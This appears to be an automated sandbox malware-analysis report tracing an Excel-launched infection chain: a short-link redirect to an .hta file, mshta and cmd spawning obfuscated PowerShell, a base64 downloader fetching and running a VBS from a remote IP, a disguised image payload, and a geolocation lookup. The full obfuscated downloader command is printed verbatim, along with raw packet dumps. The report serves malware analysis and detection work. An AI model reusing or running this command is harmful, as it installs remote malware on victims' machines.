                                              Data Ascii: ujV6EvOXqDj68nOcpjP5EYO4gz54oMO2iTJ2EtNCZzI2QQNZTzbzI0MYMjDy4kMkIDBxEdM4BD7wQOAAAAaAQAwAAAA/MzPr4zi+kmPO5DR+cQPt2zl8kPPGzzg8UDPrsDv7whOArTQ68hOCkzz5MbOCmDV4sMOvijh401NffTw3g5NvdDA2IuNDbTu2MqNEaTT1YdNGXzu1QZNbVDP0ALNASTY0UENFMz7zk2MYNzQzAhMuKzp
                                              Sep 9, 2024 17:49:13.418452978 CEST1236INData Raw: 41 67 50 67 33 44 34 39 6b 42 50 2f 7a 44 37 38 49 4e 50 2f 79 54 70 37 63 37 4f 78 75 7a 48 36 6f 52 4f 69 6c 7a 57 35 41 55 4f 36 6b 7a 4d 35 55 53 4f 61 6b 7a 45 34 59 4f 4f 4e 6a 7a 4b 32 51 71 4e 68 59 44 42 31 77 66 4e 7a 58 7a 78 31 55 45
                                              Data Ascii: AgPg3D49kBP/zD78INP/yTp7c7OxuzH6oROilzW5AUO6kzM5USOakzE4YOONjzK2QqNhYDB1wfNzXzx1UEN0TD70kJNhJjBwgDMoAAAAQFAEAFA/M+Pk+TI+ImPI1z29AdP+2Du7cZO5nDU50wNtfTY3AkN1bT62UtNPbTx2orN2YjL2YiNXYTD2IQNOXjl08INURjFzo/MmPjmzY3M5Iz8yktMyKjfycjMuITHxgfMgHD2xwcM
                                              Sep 9, 2024 17:49:13.422858000 CEST1236INData Raw: 6b 6a 73 35 67 61 4f 65 6c 44 56 35 45 53 4f 55 67 6a 5a 34 34 46 4f 56 68 44 47 34 38 77 4e 31 66 54 66 33 45 33 4e 4d 59 44 61 31 45 56 4e 46 56 44 46 31 34 51 4e 48 51 54 2b 30 6b 4e 4e 39 53 54 73 30 41 4b 4e 46 53 7a 64 30 30 47 4e 6a 52 7a
                                              Data Ascii: kjs5gaOelDV5ESOUgjZ44FOVhDG48wN1fTf3E3NMYDa1EVNFVDF14QNHQT+0kNN9STs0AKNFSzd00GNjRzR0MDNLMD8zo+McPzuzs6MmODlxcDMTAAAAwFADAKAAAwPE/TN+wdP5wz44wqNwbD62IuNKbTK00FNMNTSy4tMZLTwycnMXJzBxYbM1FjSwEPMfDz1w8FAAAAQAMAkA8Dq/w5PK+TZ/s1PL9jR/4zPO8TC/QgP47T0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.2249172178.237.33.50804064C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 9, 2024 17:49:16.184298992 CEST71OUTGET /json.gp HTTP/1.1
                                              Host: geoplugin.net
                                              Cache-Control: no-cache
                                              Sep 9, 2024 17:49:16.819039106 CEST1170INHTTP/1.1 200 OK
                                              date: Mon, 09 Sep 2024 15:49:16 GMT
                                              server: Apache
                                              content-length: 962
                                              content-type: application/json; charset=utf-8
                                              cache-control: public, max-age=300
                                              access-control-allow-origin: *
                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.224916395.217.202.2104433236C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              TimestampBytes transferredDirectionData
                                              2024-09-09 15:48:55 UTC319OUTGET /yDfvh HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: zeep.ly
                                              Connection: Keep-Alive
                                              2024-09-09 15:48:56 UTC510INHTTP/1.1 301 Moved Permanently
                                              Date: Mon, 09 Sep 2024 15:48:56 GMT
                                              Server: Apache
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Set-Cookie: PHPSESSID=8cd3dbd06893a5c7e0fa0cf74aa14fe9; path=/
                                              Set-Cookie: short_478567=1; expires=Mon, 09-Sep-2024 16:03:56 GMT; Max-Age=900; path=/; HttpOnly
                                              location: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta
                                              Content-Length: 0
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.224916595.217.202.2104433504C:\Windows\System32\mshta.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-09 15:48:58 UTC367OUTGET /yDfvh HTTP/1.1
                                              Accept: */*
                                              Accept-Language: en-US
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: zeep.ly
                                              Connection: Keep-Alive
                                              Cookie: short_478567=1
                                              2024-09-09 15:48:58 UTC412INHTTP/1.1 301 Moved Permanently
                                              Date: Mon, 09 Sep 2024 15:48:58 GMT
                                              Server: Apache
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Set-Cookie: PHPSESSID=30ad27ae134d951fbb0634292c04cc32; path=/
                                              location: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta
                                              Content-Length: 0
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.2249168207.241.227.964433940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-09 15:49:10 UTC113OUTGET /2/items/new_image_20240905/new_image.jpg HTTP/1.1
                                              Host: ia601706.us.archive.org
                                              Connection: Keep-Alive
                                              2024-09-09 15:49:10 UTC582INHTTP/1.1 200 OK
                                              Server: nginx/1.25.1
                                              Date: Mon, 09 Sep 2024 15:49:10 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 1931225
                                              Last-Modified: Thu, 05 Sep 2024 02:35:43 GMT
                                              Connection: close
                                              ETag: "66d918ff-1d77d9"
                                              Strict-Transport-Security: max-age=15724800
                                              Expires: Mon, 09 Sep 2024 21:49:10 GMT
                                              Cache-Control: max-age=21600
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                              Access-Control-Allow-Credentials: true
                                              Accept-Ranges: bytes
                                              2024-09-09 15:49:10 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                              2024-09-09 15:49:10 UTC16384INData Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d
                                              Data Ascii: G"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
                                              2024-09-09 15:49:10 UTC16384INData Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c
                                              Data Ascii: ;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy|f
                                              2024-09-09 15:49:10 UTC16384INData Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28
                                              Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a|c(
                                              2024-09-09 15:49:10 UTC16384INData Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d
                                              Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
                                              2024-09-09 15:49:10 UTC16384INData Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f
                                              Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]XC$v
                                              2024-09-09 15:49:10 UTC16384INData Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c
                                              Data Ascii: 62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(VrG
                                              2024-09-09 15:49:10 UTC16384INData Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43
                                              Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|%'urC
                                              2024-09-09 15:49:10 UTC16384INData Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d
                                              Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
                                              2024-09-09 15:49:10 UTC16384INData Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49
                                              Data Ascii: is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z~~UI


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:11:48:04
                                              Start date:09/09/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13fbe0000
                                              File size:28'253'536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:4
                                              Start time:11:48:55
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\mshta.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                              Imagebase:0x13f410000
                                              File size:13'824 bytes
                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:11:48:59
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
                                              Imagebase:0x4a1e0000
                                              File size:345'088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:11:48:59
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
